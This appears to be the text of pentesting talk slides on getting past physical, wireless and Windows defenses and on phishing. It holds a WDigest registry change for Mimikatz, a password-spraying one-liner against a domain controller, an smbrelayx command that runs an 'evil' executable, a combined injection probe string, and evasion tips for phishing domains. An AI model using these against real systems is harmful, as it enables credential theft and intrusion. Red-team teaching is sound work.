AKA Tantric Pentesting
by Laurent Desaulniers
Nsec Challenge Designer
If it is stupid and it works, then it is not stupid *
15 character minimum password policy
No Nebtios/LLMNR/Responder <3
Repeat after me: I AM NOT JAMES BOND
ProxMark/RavenHid is conspicuous
Key Impressioning is hard
Lockpicking can be hard, under pressure
Always keep spare keys for switching
Universal Door Controller *
1 Pending approval from the demo gods
Hackers take selfies too…
Hackers take selfie too…
Client has EAP, well configured clients, and only accepts valid certificates
Simple access point + captive portal
DO NOT use an already existing SSID
Create your own.
→ Bypasses most WIPS solutions.
With most organisations, you can still win using:
But what happens when all of these are blocked
If you can run Mimikatz, you are admin.
You can disable the anti-Mimikatz!
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
Powerspraying is a very effective technique
Try 1 password for all accounts
No powershell? No problem!
@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) \ DO @net use DOMAINCONTROLLERIPC$ /user:DOMAIN%n %p 1>NUL 2>&1 \ && @echo [*] %n:%p && @net use /delete DOMAINCONTROLLERIPC$ > NUL
20 character password policy? No problem!
SMB Relay is very hard to protect against.
Nessus classifies the finding as low
./smbrelayx.py -h [My_IP] -e [My_EVIL_EXE]
If you can get tech support to connect to you, you won!
My favourites are:
"My screen’s background is asking me for money"
"Why did you install a dancing pig icon telling me to call tech support?"
You can then:
invoke-mimikatz Freeze The Ram SMB Relay Fake-UAC
Improve your phishing game
Do NOT use security related motives
People are trained to recognized this as phishing.
Test was supposed to be secret… But suddenly, everyone knows about it?
I always include a SMB Relay image in all my phish.
Users are told to forward phishing to tech support
Using - instead of . works wonders:
stairs-mydomain.com support-mydomain.com wwww-mydomain.com hr-mydomain.com
Always set up valid SPF records.
Helps to prevent being categorized as spam..
Make sure that the website is properly categorized by crawler
HINT Redirect all IPs to the original website, except your target’s.
I use Phishing Frenzy for all of my phishing needs.
I am told GoPhish is very good as well.
Or '1'='<script>alert(1)>../../../passwd%0a%0d Referer:VeryLongDomain.com?id=342333
If the referer is crawled, you know that someone is watching the log.